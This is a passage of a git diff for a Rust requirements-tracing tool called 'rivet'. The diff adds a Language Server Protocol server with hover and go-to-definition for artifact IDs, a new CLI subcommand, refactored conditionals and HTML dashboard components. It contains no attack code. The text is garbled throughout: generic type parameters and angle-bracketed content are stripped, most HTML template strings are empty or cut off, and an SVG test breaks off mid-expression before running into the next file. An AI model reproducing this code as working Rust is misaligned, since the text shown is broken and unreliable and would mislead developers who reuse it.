PortDirection::In, + port_type: PortType::Data, + }, + PortInfo { + id: "event_out".into(), + label: "event_out".into(), + side: PortSide::Right, + direction: PortDirection::Out, + port_type: PortType::Event, + }, + ], + }, + &|_idx: EdgeIndex, _e: &&str| EdgeInfo { + label: String::new(), + source_port: None, + target_port: None, + }, + &LayoutOptions::default(), + ); + + let svg = render_svg(&gl, &SvgOptions::default()); + // Port elements present + assert!( + svg.contains("class=\"port data\""), + "should have data port class" + ); + assert!( + svg.contains("class=\"port event\""), + "should have event port class" + ); + // Port circles present + assert!(svg.contains("data_in<"), "should have port label"); + assert!(svg.contains(">event_out<"), "should have port label"); + // Port CSS styles present + assert!( + svg.contains(".port.data circle"), + "should have port data CSS" + ); + assert!( + svg.contains(".port.event circle"), + "should have port event CSS" + ); + // Direction indicator triangle + assert!( + svg.contains(", +} + +// --------------------------------------------------------------------------- +// Text utilities +// --------------------------------------------------------------------------- + +/// Extract the artifact ID at the given (0-based line, 0-based column) position +/// if the cursor sits inside a `[[ID]]` reference. +pub(crate) fn artifact_id_at_position(text: &str, line: u32, character: u32) -> Option { + let target_line = text.lines().nth(line as usize)?; + let col = character as usize; + + // Walk backwards from cursor to find `[[` + let bytes = target_line.as_bytes(); + let mut start = None; + let mut i = col.min(bytes.len()); + while i >= 2 { + if bytes[i - 2] == b'[' && bytes[i - 1] == b'[' { + start = Some(i); + break; + } + // If we cross a `]]` boundary going backwards, stop. 
+ if bytes[i - 1] == b']' && i >= 2 && bytes[i - 2] == b']' { + break; + } + i -= 1; + } + + let start = start?; + + // Walk forward from `[[` to find `]]` + let rest = &target_line[start..]; + let end = rest.find("]]")?; + let id = rest[..end].trim(); + + // Make sure the cursor is actually inside the `[[...]]` span. + let bracket_end = start + end + 2; + if col < start.saturating_sub(2) || col > bracket_end { + return None; + } + + if id.is_empty() { + return None; + } + + Some(id.to_string()) +} + +/// Also check for bare artifact IDs on YAML `id:` or `target:` lines. +pub(crate) fn yaml_artifact_id_at_position(text: &str, line: u32) -> Option { + let target_line = text.lines().nth(line as usize)?; + let trimmed = target_line.trim(); + + // `- id: SOME-ID` or `id: SOME-ID` + if let Some(rest) = trimmed + .strip_prefix("- id:") + .or_else(|| trimmed.strip_prefix("id:")) + { + let id = rest.trim(); + if !id.is_empty() { + return Some(id.to_string()); + } + } + + // `target: SOME-ID` + if let Some(rest) = trimmed + .strip_prefix("- target:") + .or_else(|| trimmed.strip_prefix("target:")) + { + let id = rest.trim(); + if !id.is_empty() { + return Some(id.to_string()); + } + } + + None +} + +/// Scan a YAML file to build an (artifact_id -> line_number) map. +/// +/// Looks for lines matching `- id: ` or ` id: `. 
+pub(crate) fn scan_artifact_locations( + path: &Path, + content: &str, +) -> HashMap { + let mut map = HashMap::new(); + for (line_idx, line) in content.lines().enumerate() { + let trimmed = line.trim(); + let id = if let Some(rest) = trimmed.strip_prefix("- id:") { + rest.trim() + } else if let Some(rest) = trimmed.strip_prefix("id:") { + rest.trim() + } else { + continue; + }; + if !id.is_empty() { + map.insert(id.to_string(), (path.to_path_buf(), line_idx as u32)); + } + } + map +} + +// --------------------------------------------------------------------------- +// Diagnostic conversion +// --------------------------------------------------------------------------- + +/// Convert a rivet-core `Diagnostic` into an LSP `Diagnostic`. +pub(crate) fn to_lsp_diagnostic( + diag: &validate::Diagnostic, + locations: &HashMap, +) -> lsp_types::Diagnostic { + let range = diag + .artifact_id + .as_ref() + .and_then(|id| locations.get(id)) + .map(|(_path, line)| Range { + start: Position::new(*line, 0), + end: Position::new(*line, 999), + }) + .unwrap_or_default(); + + lsp_types::Diagnostic { + range, + severity: Some(match diag.severity { + Severity::Error => DiagnosticSeverity::ERROR, + Severity::Warning => DiagnosticSeverity::WARNING, + Severity::Info => DiagnosticSeverity::INFORMATION, + }), + code: Some(NumberOrString::String(diag.rule.clone())), + source: Some("rivet".into()), + message: diag.message.clone(), + ..Default::default() + } +} + +// --------------------------------------------------------------------------- +// Build hover markdown for an artifact +// --------------------------------------------------------------------------- + +fn hover_markdown(artifact: &Artifact) -> String { + let mut md = format!("### {}\n\n", artifact.title); + md.push_str(&format!("**Type:** `{}`\n\n", artifact.artifact_type)); + if let Some(status) = &artifact.status { + md.push_str(&format!("**Status:** `{status}`\n\n")); + } + if let Some(desc) = &artifact.description { + let 
preview = if desc.len() > 300 { + format!("{}...", &desc[..300]) + } else { + desc.clone() + }; + md.push_str(&format!("---\n\n{preview}\n")); + } + if !artifact.links.is_empty() { + md.push_str("\n**Links:**\n"); + for link in &artifact.links { + md.push_str(&format!("- `{}` -> `{}`\n", link.link_type, link.target)); + } + } + md +} + +// --------------------------------------------------------------------------- +// RivetLsp — the LanguageServer implementation +// --------------------------------------------------------------------------- + +pub(crate) struct RivetLsp { + client: Client, + /// In-memory document contents keyed by URI. + documents: Mutex>, + /// Current project snapshot (rebuilt on save). + snapshot: Mutex>, + /// Project root directory (the folder containing rivet.yaml). + project_root: Mutex>, +} + +impl RivetLsp { + fn new(client: Client) -> Self { + Self { + client, + documents: Mutex::new(HashMap::new()), + snapshot: Mutex::new(None), + project_root: Mutex::new(None), + } + } + + /// Detect the project root from a file URI by walking up to find rivet.yaml. + fn detect_project_root(&self, uri: &Url) -> Option { + let file_path = uri.to_file_path().ok()?; + let mut dir = file_path.parent()?; + loop { + if dir.join("rivet.yaml").exists() { + return Some(dir.to_path_buf()); + } + dir = dir.parent()?; + } + } + + /// Rebuild the project snapshot and publish diagnostics. + async fn rebuild_and_publish(&self, trigger_uri: Url) { + // Detect project root if not set. 
+ { + let mut root = self.project_root.lock().unwrap(); + if root.is_none() + && let Some(detected) = self.detect_project_root(&trigger_uri) + { + *root = Some(detected); + } + } + + let project_root = { + let root = self.project_root.lock().unwrap(); + root.clone() + }; + + let project_root = match project_root { + Some(r) => r, + None => { + self.client + .log_message( + MessageType::WARNING, + "No rivet.yaml found; skipping validation.", + ) + .await; + return; + } + }; + + let config_path = project_root.join("rivet.yaml"); + let config = match rivet_core::load_project_config(&config_path) { + Ok(c) => c, + Err(e) => { + self.client + .log_message( + MessageType::ERROR, + format!("Failed to load rivet.yaml: {e}"), + ) + .await; + return; + } + }; + + let schemas_dir = project_root.join("schemas"); + let schema = match rivet_core::load_schemas(&config.project.schemas, &schemas_dir) { + Ok(s) => s, + Err(e) => { + self.client + .log_message(MessageType::ERROR, format!("Failed to load schemas: {e}")) + .await; + return; + } + }; + + let mut store = Store::new(); + let mut locations: HashMap = HashMap::new(); + + for source in &config.sources { + let path = project_root.join(&source.path); + + // Scan YAML files for artifact locations before loading. 
+ let yaml_paths: Vec = if path.is_dir() { + std::fs::read_dir(&path) + .ok() + .map(|rd| { + rd.filter_map(|e| e.ok()) + .map(|e| e.path()) + .filter(|p| { + p.extension() + .is_some_and(|ext| ext == "yaml" || ext == "yml") + }) + .collect() + }) + .unwrap_or_default() + } else if path.exists() { + vec![path.clone()] + } else { + vec![] + }; + + for yaml_path in &yaml_paths { + if let Ok(content) = std::fs::read_to_string(yaml_path) { + locations.extend(scan_artifact_locations(yaml_path, &content)); + } + } + + match rivet_core::load_artifacts(source, &project_root) { + Ok(artifacts) => { + for artifact in artifacts { + store.upsert(artifact); + } + } + Err(e) => { + self.client + .log_message( + MessageType::ERROR, + format!("Failed to load source '{}': {e}", source.path), + ) + .await; + } + } + } + + let graph = LinkGraph::build(&store, &schema); + + // Load documents. + let mut doc_store = DocumentStore::new(); + for docs_path in &config.docs { + let dir = project_root.join(docs_path); + if let Ok(docs) = rivet_core::document::load_documents(&dir) { + for doc in docs { + doc_store.insert(doc); + } + } + } + + // Run validation. + let mut diagnostics = validate::validate(&store, &schema, &graph); + diagnostics.extend(validate::validate_documents(&doc_store, &store)); + + // Group diagnostics by file. + let mut by_file: HashMap> = HashMap::new(); + + for diag in &diagnostics { + let lsp_diag = to_lsp_diagnostic(diag, &locations); + let uri = diag + .artifact_id + .as_ref() + .and_then(|id| locations.get(id)) + .and_then(|(path, _)| Url::from_file_path(path).ok()) + .unwrap_or_else(|| trigger_uri.clone()); + + by_file.entry(uri).or_default().push(lsp_diag); + } + + // Clear diagnostics on files that are now clean. + // We always publish at least the trigger URI to clear stale diagnostics. 
+ by_file.entry(trigger_uri).or_default(); + + for (uri, diags) in &by_file { + self.client + .publish_diagnostics(uri.clone(), diags.clone(), None) + .await; + } + + // Store the snapshot. + *self.snapshot.lock().unwrap() = Some(Snapshot { + store, + schema, + graph, + doc_store, + locations, + }); + } +} + +#[tower_lsp::async_trait] +impl LanguageServer for RivetLsp { + async fn initialize(&self, params: InitializeParams) -> Result { + // Try to pick up the workspace root. + if let Some(root_uri) = params.root_uri.as_ref().and_then(|u| u.to_file_path().ok()) { + let mut root = self.project_root.lock().unwrap(); + if root.is_none() && root_uri.join("rivet.yaml").exists() { + *root = Some(root_uri); + } + } + + Ok(InitializeResult { + capabilities: ServerCapabilities { + text_document_sync: Some(TextDocumentSyncCapability::Options( + TextDocumentSyncOptions { + open_close: Some(true), + change: Some(TextDocumentSyncKind::FULL), + save: Some(TextDocumentSyncSaveOptions::SaveOptions(SaveOptions { + include_text: Some(true), + })), + ..Default::default() + }, + )), + hover_provider: Some(HoverProviderCapability::Simple(true)), + definition_provider: Some(OneOf::Left(true)), + ..Default::default() + }, + ..Default::default() + }) + } + + async fn initialized(&self, _: InitializedParams) { + self.client + .log_message(MessageType::INFO, "Rivet LSP initialized") + .await; + } + + async fn shutdown(&self) -> Result<()> { + Ok(()) + } + + async fn did_open(&self, params: DidOpenTextDocumentParams) { + let uri = params.text_document.uri.clone(); + self.documents + .lock() + .unwrap() + .insert(uri.clone(), params.text_document.text); + self.rebuild_and_publish(uri).await; + } + + async fn did_change(&self, params: DidChangeTextDocumentParams) { + if let Some(change) = params.content_changes.into_iter().last() { + self.documents + .lock() + .unwrap() + .insert(params.text_document.uri, change.text); + } + } + + async fn did_save(&self, params: DidSaveTextDocumentParams) { + 
let uri = params.text_document.uri.clone(); + if let Some(text) = params.text { + self.documents.lock().unwrap().insert(uri.clone(), text); + } + self.rebuild_and_publish(uri).await; + } + + async fn hover(&self, params: HoverParams) -> Result<Option<Hover>> { + let uri = params + .text_document_position_params + .text_document + .uri + .clone(); + let pos = params.text_document_position_params.position; + + let text = { + let docs = self.documents.lock().unwrap(); + docs.get(&uri).cloned() + }; + + let text = match text { + Some(t) => t, + None => return Ok(None), + }; + + // Try [[ID]] first, then YAML id:/target: line. + let artifact_id = artifact_id_at_position(&text, pos.line, pos.character) + .or_else(|| yaml_artifact_id_at_position(&text, pos.line)); + + let artifact_id = match artifact_id { + Some(id) => id, + None => return Ok(None), + }; + + let snapshot = self.snapshot.lock().unwrap(); + let snapshot = match snapshot.as_ref() { + Some(s) => s, + None => return Ok(None), + }; + + let artifact = match snapshot.store.get(&artifact_id) { + Some(a) => a, + None => return Ok(None), + }; + + let md = hover_markdown(artifact); + + Ok(Some(Hover { + contents: HoverContents::Markup(MarkupContent { + kind: MarkupKind::Markdown, + value: md, + }), + range: None, + })) + } + + async fn goto_definition( + &self, + params: GotoDefinitionParams, + ) -> Result<Option<GotoDefinitionResponse>> { + let uri = params + .text_document_position_params + .text_document + .uri + .clone(); + let pos = params.text_document_position_params.position; + + let text = { + let docs = self.documents.lock().unwrap(); + docs.get(&uri).cloned() + }; + + let text = match text { + Some(t) => t, + None => return Ok(None), + }; + + let artifact_id = artifact_id_at_position(&text, pos.line, pos.character) + .or_else(|| yaml_artifact_id_at_position(&text, pos.line)); + + let artifact_id = match artifact_id { + Some(id) => id, + None => return Ok(None), + }; + + let snapshot = self.snapshot.lock().unwrap(); + let snapshot = match 
snapshot.as_ref() { + Some(s) => s, + None => return Ok(None), + }; + + let (path, line) = match snapshot.locations.get(&artifact_id) { + Some(loc) => loc, + None => return Ok(None), + }; + + let target_uri = match Url::from_file_path(path) { + Ok(u) => u, + Err(()) => return Ok(None), + }; + + Ok(Some(GotoDefinitionResponse::Scalar(Location { + uri: target_uri, + range: Range { + start: Position::new(*line, 0), + end: Position::new(*line, 999), + }, + }))) + } +} + +// --------------------------------------------------------------------------- +// Entry point — called from `rivet lsp` +// --------------------------------------------------------------------------- + +pub async fn run_lsp() { + let stdin = tokio::io::stdin(); + let stdout = tokio::io::stdout(); + + let (service, socket) = LspService::new(RivetLsp::new); + Server::new(stdin, stdout, socket).serve(service).await; +} + +// --------------------------------------------------------------------------- +// Tests +// --------------------------------------------------------------------------- + +#[cfg(test)] +mod tests { + use super::*; + + // -- artifact_id_at_position ------------------------------------------- + + #[test] + fn extract_id_inside_brackets() { + let text = "See [[REQ-001]] for details."; + assert_eq!(artifact_id_at_position(text, 0, 8), Some("REQ-001".into())); + } + + #[test] + fn extract_id_at_opening_bracket() { + let text = "See [[REQ-001]] for details."; + assert_eq!(artifact_id_at_position(text, 0, 6), Some("REQ-001".into())); + } + + #[test] + fn extract_id_at_closing_bracket() { + let text = "See [[REQ-001]] for details."; + assert_eq!(artifact_id_at_position(text, 0, 14), Some("REQ-001".into())); + } + + #[test] + fn no_id_outside_brackets() { + let text = "See [[REQ-001]] for details."; + assert_eq!(artifact_id_at_position(text, 0, 0), None); + assert_eq!(artifact_id_at_position(text, 0, 20), None); + } + + #[test] + fn multiline_extraction() { + let text = "first line\n[[H-002]] 
second line\nthird"; + assert_eq!(artifact_id_at_position(text, 1, 4), Some("H-002".into())); + } + + #[test] + fn empty_brackets_return_none() { + let text = "[[]] nothing"; + assert_eq!(artifact_id_at_position(text, 0, 2), None); + } + + // -- yaml_artifact_id_at_position -------------------------------------- + + #[test] + fn yaml_id_line() { + let text = " - id: REQ-042\n title: Foo"; + assert_eq!( + yaml_artifact_id_at_position(text, 0), + Some("REQ-042".into()) + ); + } + + #[test] + fn yaml_target_line() { + let text = " - target: UCA-003\n"; + assert_eq!( + yaml_artifact_id_at_position(text, 0), + Some("UCA-003".into()) + ); + } + + #[test] + fn yaml_non_id_line() { + let text = " title: Some Title"; + assert_eq!(yaml_artifact_id_at_position(text, 0), None); + } + + // -- scan_artifact_locations ------------------------------------------- + + #[test] + fn scan_locations_from_yaml() { + let content = "\ +artifacts: + - id: REQ-001 + title: First + - id: REQ-002 + title: Second +"; + let locs = scan_artifact_locations(Path::new("/test.yaml"), content); + assert_eq!(locs.len(), 2); + assert_eq!(locs.get("REQ-001"), Some(&(PathBuf::from("/test.yaml"), 1))); + assert_eq!(locs.get("REQ-002"), Some(&(PathBuf::from("/test.yaml"), 3))); + } + + // -- to_lsp_diagnostic ------------------------------------------------- + + #[test] + fn convert_error_diagnostic() { + let mut locations = HashMap::new(); + locations.insert("REQ-001".to_string(), (PathBuf::from("/test.yaml"), 5)); + + let diag = validate::Diagnostic { + severity: Severity::Error, + artifact_id: Some("REQ-001".to_string()), + rule: "known-type".to_string(), + message: "unknown artifact type 'bogus'".to_string(), + }; + + let lsp_diag = to_lsp_diagnostic(&diag, &locations); + assert_eq!(lsp_diag.severity, Some(DiagnosticSeverity::ERROR)); + assert_eq!(lsp_diag.source, Some("rivet".into())); + assert_eq!(lsp_diag.range.start.line, 5); + assert_eq!(lsp_diag.message, "unknown artifact type 'bogus'"); + 
assert_eq!( + lsp_diag.code, + Some(NumberOrString::String("known-type".into())) + ); + } + + #[test] + fn convert_warning_diagnostic() { + let locations = HashMap::new(); + + let diag = validate::Diagnostic { + severity: Severity::Warning, + artifact_id: None, + rule: "allowed-values".to_string(), + message: "bad value".to_string(), + }; + + let lsp_diag = to_lsp_diagnostic(&diag, &locations); + assert_eq!(lsp_diag.severity, Some(DiagnosticSeverity::WARNING)); + // No location known -> default range. + assert_eq!(lsp_diag.range, Range::default()); + } + + #[test] + fn convert_info_diagnostic() { + let locations = HashMap::new(); + + let diag = validate::Diagnostic { + severity: Severity::Info, + artifact_id: None, + rule: "coverage".to_string(), + message: "info message".to_string(), + }; + + let lsp_diag = to_lsp_diagnostic(&diag, &locations); + assert_eq!(lsp_diag.severity, Some(DiagnosticSeverity::INFORMATION)); + } + + // -- initialize capabilities ------------------------------------------ + + #[test] + fn initialize_returns_correct_capabilities() { + // We verify that the ServerCapabilities struct we build is correct + // by constructing it the same way the LSP handler does. 
+ let capabilities = ServerCapabilities { + text_document_sync: Some(TextDocumentSyncCapability::Options( + TextDocumentSyncOptions { + open_close: Some(true), + change: Some(TextDocumentSyncKind::FULL), + save: Some(TextDocumentSyncSaveOptions::SaveOptions(SaveOptions { + include_text: Some(true), + })), + ..Default::default() + }, + )), + hover_provider: Some(HoverProviderCapability::Simple(true)), + definition_provider: Some(OneOf::Left(true)), + ..Default::default() + }; + + // text_document_sync + match &capabilities.text_document_sync { + Some(TextDocumentSyncCapability::Options(opts)) => { + assert_eq!(opts.open_close, Some(true)); + assert_eq!(opts.change, Some(TextDocumentSyncKind::FULL)); + assert!(opts.save.is_some()); + } + other => panic!("unexpected text_document_sync: {other:?}"), + } + + // hover + assert_eq!( + capabilities.hover_provider, + Some(HoverProviderCapability::Simple(true)) + ); + + // definition + assert_eq!(capabilities.definition_provider, Some(OneOf::Left(true))); + } + + // -- hover_markdown ---------------------------------------------------- + + #[test] + fn hover_markdown_includes_fields() { + use rivet_core::model::{Artifact, Link}; + use std::collections::BTreeMap; + + let artifact = Artifact { + id: "REQ-001".into(), + artifact_type: "requirement".into(), + title: "First requirement".into(), + description: Some("A detailed description.".into()), + status: Some("approved".into()), + tags: vec![], + links: vec![Link { + link_type: "satisfies".into(), + target: "FEAT-001".into(), + }], + fields: BTreeMap::new(), + source_file: None, + }; + + let md = hover_markdown(&artifact); + assert!(md.contains("### First requirement")); + assert!(md.contains("**Type:** `requirement`")); + assert!(md.contains("**Status:** `approved`")); + assert!(md.contains("A detailed description.")); + assert!(md.contains("`satisfies` -> `FEAT-001`")); + } +} diff --git a/rivet-cli/src/main.rs b/rivet-cli/src/main.rs index a225f10..ab07527 100644 --- 
a/rivet-cli/src/main.rs +++ b/rivet-cli/src/main.rs @@ -16,6 +16,7 @@ use rivet_core::store::Store; use rivet_core::validate; mod docs; +mod lsp; mod schema_cmd; mod serve; @@ -249,6 +250,9 @@ enum Command { port: u16, }, + /// Start the Language Server Protocol (LSP) server on stdin/stdout + Lsp, + /// Sync external project dependencies into .rivet/repos/ Sync, @@ -440,6 +444,11 @@ fn run(cli: Cli) -> Result { ))?; Ok(true) } + Command::Lsp => { + let rt = tokio::runtime::Runtime::new().context("failed to create tokio runtime")?; + rt.block_on(lsp::run_lsp()); + Ok(true) + } Command::Sync => cmd_sync(&cli), Command::Lock { update } => cmd_lock(&cli, *update), Command::Baseline { action } => match action { @@ -885,54 +894,54 @@ fn cmd_validate(cli: &Cli, format: &str) -> Result { let mut backlinks: Vec = Vec::new(); let mut circular_deps: Vec = Vec::new(); let mut version_conflicts: Vec = Vec::new(); - if let Some(ref externals) = config.externals { - if !externals.is_empty() { - match rivet_core::externals::load_all_externals(externals, &cli.project) { - Ok(resolved) => { - // Build external ID sets - let mut external_ids: std::collections::BTreeMap< - String, - std::collections::HashSet, - > = std::collections::BTreeMap::new(); - for ext in &resolved { - let ids: std::collections::HashSet = - ext.artifacts.iter().map(|a| a.id.clone()).collect(); - external_ids.insert(ext.prefix.clone(), ids); - } + if let Some(ref externals) = config.externals + && !externals.is_empty() + { + match rivet_core::externals::load_all_externals(externals, &cli.project) { + Ok(resolved) => { + // Build external ID sets + let mut external_ids: std::collections::BTreeMap< + String, + std::collections::HashSet, + > = std::collections::BTreeMap::new(); + for ext in &resolved { + let ids: std::collections::HashSet = + ext.artifacts.iter().map(|a| a.id.clone()).collect(); + external_ids.insert(ext.prefix.clone(), ids); + } - // Collect local IDs and all link targets - let local_ids: 
std::collections::HashSet = - store.iter().map(|a| a.id.clone()).collect(); - let all_refs: Vec<&str> = store - .iter() - .flat_map(|a| a.links.iter().map(|l| l.target.as_str())) - .collect(); + // Collect local IDs and all link targets + let local_ids: std::collections::HashSet = + store.iter().map(|a| a.id.clone()).collect(); + let all_refs: Vec<&str> = store + .iter() + .flat_map(|a| a.links.iter().map(|l| l.target.as_str())) + .collect(); - cross_repo_broken = - rivet_core::externals::validate_refs(&all_refs, &local_ids, &external_ids); + cross_repo_broken = + rivet_core::externals::validate_refs(&all_refs, &local_ids, &external_ids); - // Compute backlinks from external artifacts pointing to local artifacts - backlinks = rivet_core::externals::compute_backlinks(&resolved, &local_ids); - } - Err(e) => { - eprintln!(" warning: could not load externals for cross-repo validation: {e}"); - } + // Compute backlinks from external artifacts pointing to local artifacts + backlinks = rivet_core::externals::compute_backlinks(&resolved, &local_ids); } + Err(e) => { + eprintln!(" warning: could not load externals for cross-repo validation: {e}"); + } + } - // Detect circular dependencies in the externals graph - circular_deps = rivet_core::externals::detect_circular_deps( - externals, - &config.project.name, - &cli.project, - ); + // Detect circular dependencies in the externals graph + circular_deps = rivet_core::externals::detect_circular_deps( + externals, + &config.project.name, + &cli.project, + ); - // Detect version conflicts (same repo at different refs) - version_conflicts = rivet_core::externals::detect_version_conflicts( - externals, - &config.project.name, - &cli.project, - ); - } + // Detect version conflicts (same repo at different refs) + version_conflicts = rivet_core::externals::detect_version_conflicts( + externals, + &config.project.name, + &cli.project, + ); } // Lifecycle completeness check @@ -1861,11 +1870,11 @@ fn cmd_commit_msg_check(cli: &Cli, 
file: &std::path::Path) -> Result { let subject = message.lines().next().unwrap_or(""); // Check exempt type - if let Some(ct) = rivet_core::commits::parse_commit_type(subject) { - if commits_cfg.exempt_types.iter().any(|et| et == &ct) { - log::debug!("commit type '{ct}' is exempt"); - return Ok(true); - } + if let Some(ct) = rivet_core::commits::parse_commit_type(subject) + && commits_cfg.exempt_types.iter().any(|et| et == &ct) + { + log::debug!("commit type '{ct}' is exempt"); + return Ok(true); } // Check skip trailer @@ -2188,12 +2197,12 @@ fn resolve_schemas_dir(cli: &Cli) -> PathBuf { } // Try relative to the binary location - if let Ok(exe) = std::env::current_exe() { - if let Some(parent) = exe.parent() { - let bin_schemas = parent.join("../schemas"); - if bin_schemas.exists() { - return bin_schemas; - } + if let Ok(exe) = std::env::current_exe() + && let Some(parent) = exe.parent() + { + let bin_schemas = parent.join("../schemas"); + if bin_schemas.exists() { + return bin_schemas; } } @@ -2236,17 +2245,16 @@ fn cmd_sync(cli: &Cli) -> Result { if let Some(ext) = externals.get(name) { let ext_dir = rivet_core::externals::resolve_external_dir(ext, &cache_dir, &cli.project); - if ext_dir.join(".git").exists() { - if let Ok(current) = rivet_core::externals::git_head_sha(&ext_dir) { - if current != entry.commit { - eprintln!( - " Warning: {} is at {} but lockfile pins {}", - name, - &current[..8.min(current.len())], - &entry.commit[..8.min(entry.commit.len())] - ); - } - } + if ext_dir.join(".git").exists() + && let Ok(current) = rivet_core::externals::git_head_sha(&ext_dir) + && current != entry.commit + { + eprintln!( + " Warning: {} is at {} but lockfile pins {}", + name, + &current[..8.min(current.len())], + &entry.commit[..8.min(entry.commit.len())] + ); } } } diff --git a/rivet-cli/src/serve/components.rs b/rivet-cli/src/serve/components.rs new file mode 100644 index 0000000..65b6933 --- /dev/null +++ b/rivet-cli/src/serve/components.rs @@ -0,0 +1,716 @@ +//! 
Reusable HTML UI components for the Rivet dashboard. +//! +//! Each component renders an HTML fragment as a `String`. All components +//! encode their state in URL query parameters so the view survives page +//! reload and browser back/forward. + +// Components are built ahead of view integration — suppress dead code +// warnings until views are migrated to use them. + +use super::html_escape; + +// ── ViewParams ────────────────────────────────────────────────────────── + +/// Common query parameters shared across dashboard views. +/// +/// Views deserialise this from the request URL. Components use it to +/// render controls whose state matches the URL and to generate links +/// that preserve existing params when changing one value. +#[derive(Debug, Clone, serde::Deserialize, Default)] +pub struct ViewParams { + /// Comma-separated artifact type filter. + #[serde(default)] + pub types: Option<String>, + /// Status filter (e.g. "approved", "draft"). + #[serde(default)] + pub status: Option<String>, + /// Comma-separated tag filter. + #[serde(default)] + pub tags: Option<String>, + /// Free-text search query. + #[serde(default)] + pub q: Option<String>, + /// Sort column name. + #[serde(default)] + pub sort: Option<String>, + /// Sort direction: "asc" or "desc". + #[serde(default)] + pub dir: Option<String>, + /// 1-based page number. + #[serde(default)] + pub page: Option<usize>, + /// Items per page. + #[serde(default)] + pub per_page: Option<usize>, + /// Comma-separated IDs of open tree nodes. + #[serde(default)] + pub open: Option<String>, + /// Print mode: strips nav/chrome when true. + #[serde(default)] + pub print: Option<bool>, +} + +impl ViewParams { + /// Build a query string, merging `overrides` on top of current values. + /// Pass `("key", "")` to remove a parameter. + pub fn to_query_string(&self, overrides: &[(&str, &str)]) -> String { + let mut params: Vec<(String, String)> = Vec::new(); + + // Collect current params + macro_rules! 
push_opt { + ($field:ident) => { + if let Some(ref v) = self.$field { + if !v.is_empty() { + params.push((stringify!($field).to_string(), v.clone())); + } + } + }; + } + push_opt!(types); + push_opt!(status); + push_opt!(tags); + push_opt!(q); + push_opt!(sort); + push_opt!(dir); + push_opt!(open); + + if let Some(p) = self.page { + params.push(("page".into(), p.to_string())); + } + if let Some(pp) = self.per_page { + params.push(("per_page".into(), pp.to_string())); + } + if self.print == Some(true) { + params.push(("print".into(), "1".into())); + } + + // Apply overrides + for &(key, val) in overrides { + params.retain(|(k, _)| k != key); + if !val.is_empty() { + params.push((key.to_string(), val.to_string())); + } + } + + if params.is_empty() { + String::new() + } else { + let qs: Vec = params + .iter() + .map(|(k, v)| format!("{}={}", urlencoding::encode(k), urlencoding::encode(v))) + .collect(); + format!("?{}", qs.join("&")) + } + } + + /// Parse the `types` field into a vec of individual type strings. + pub fn type_list(&self) -> Vec { + self.types + .as_deref() + .filter(|s| !s.is_empty()) + .map(|s| s.split(',').map(|t| t.trim().to_string()).collect()) + .unwrap_or_default() + } + + /// Parse the `tags` field into a vec of individual tag strings. + pub fn tag_list(&self) -> Vec { + self.tags + .as_deref() + .filter(|s| !s.is_empty()) + .map(|s| s.split(',').map(|t| t.trim().to_string()).collect()) + .unwrap_or_default() + } + + /// Parse the `open` field into a vec of node IDs. + pub fn open_list(&self) -> Vec { + self.open + .as_deref() + .filter(|s| !s.is_empty()) + .map(|s| s.split(',').map(|t| t.trim().to_string()).collect()) + .unwrap_or_default() + } + + /// Current page (1-based, defaults to 1). + pub fn current_page(&self) -> usize { + self.page.unwrap_or(1).max(1) + } + + /// Items per page (defaults to 50). + pub fn items_per_page(&self) -> usize { + self.per_page.unwrap_or(50).clamp(10, 500) + } + + /// Sort direction: true = ascending. 
+ pub fn sort_ascending(&self) -> bool { + self.dir.as_deref() != Some("desc") + } +} + +// ── FilterBar ─────────────────────────────────────────────────────────── + +/// Configuration for a filter bar component. +pub struct FilterBarConfig<'a> { + /// Route path (e.g., "/artifacts", "/stpa"). + pub base_url: &'a str, + /// All available artifact types for checkboxes. + pub available_types: &'a [String], + /// All available status values for dropdown. + pub available_statuses: &'a [String], + /// Current view parameters (determines checked/selected state). + pub params: &'a ViewParams, +} + +/// Render a horizontal filter bar with type checkboxes, status dropdown, +/// and text search. All changes trigger HTMX GET to preserve URL state. +pub fn filter_bar(cfg: &FilterBarConfig) -> String { + let active_types = cfg.params.type_list(); + let active_status = cfg.params.status.as_deref().unwrap_or(""); + let search_text = cfg.params.q.as_deref().unwrap_or(""); + + let mut html = String::with_capacity(2048); + html.push_str( + "
", + ); + + // Wrap in a form-like container — JS updates URL on change + html.push_str(&format!( + "
", + html_escape(cfg.base_url) + )); + + // Type checkboxes + if !cfg.available_types.is_empty() { + html.push_str("
"); + html.push_str( + "Type:", + ); + for t in cfg.available_types { + let checked = if active_types.contains(t) { + " checked" + } else { + "" + }; + html.push_str(&format!( + "", + html_escape(t), + checked, + html_escape(t) + )); + } + html.push_str("
"); + } + + // Status dropdown + if !cfg.available_statuses.is_empty() { + html.push_str("
"); + html.push_str("Status:"); + html.push_str(""); + html.push_str("
"); + } + + // Text search + html.push_str( + "
", + ); + html.push_str("Search:"); + html.push_str(&format!( + "", + html_escape(search_text), + html_escape(cfg.base_url), + )); + html.push_str("
"); + + // Clear button + html.push_str(&format!( + "Clear", + html_escape(cfg.base_url), + html_escape(cfg.base_url), + )); + + html.push_str("
"); // filter-controls + html.push_str("
"); // filter-bar + + // JS to wire up checkboxes and dropdown → URL param updates + html.push_str(&format!( + r#""#, + cfg.base_url, + )); + + html +} + +// ── SortableTable ─────────────────────────────────────────────────────── + +/// Sort direction. +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +pub enum SortDir { + Asc, + Desc, +} + +/// Column definition for a sortable table. +pub struct Column { + /// Internal key used in `?sort=` param. + pub key: String, + /// Display header text. + pub label: String, + /// Whether this column is sortable. + pub sortable: bool, +} + +/// Configuration for a sortable table. +pub struct TableConfig<'a> { + pub base_url: &'a str, + pub columns: &'a [Column], + /// Each row is a vec of HTML cell contents. + pub rows: &'a [Vec], + pub params: &'a ViewParams, +} + +/// Render a sortable HTML table with clickable column headers. +pub fn sortable_table(cfg: &TableConfig) -> String { + let current_sort = cfg.params.sort.as_deref().unwrap_or(""); + let current_dir = if cfg.params.sort_ascending() { + SortDir::Asc + } else { + SortDir::Desc + }; + + let mut html = String::with_capacity(4096); + html.push_str(""); + + for col in cfg.columns.iter() { + if col.sortable { + let (new_dir, arrow) = if col.key == current_sort { + match current_dir { + SortDir::Asc => ("desc", " ↑"), + SortDir::Desc => ("asc", " ↓"), + } + } else { + ("asc", "") + }; + let qs = + cfg.params + .to_query_string(&[("sort", &col.key), ("dir", new_dir), ("page", "1")]); + html.push_str(&format!( + "", + html_escape(cfg.base_url), + qs, + html_escape(&col.label), + arrow, + )); + } else { + html.push_str(&format!("", html_escape(&col.label))); + } + } + + html.push_str(""); + + for row in cfg.rows.iter() { + html.push_str(""); + for cell in row { + html.push_str(&format!("")); + } + html.push_str(""); + } + + html.push_str("
{}{}{}
{cell}
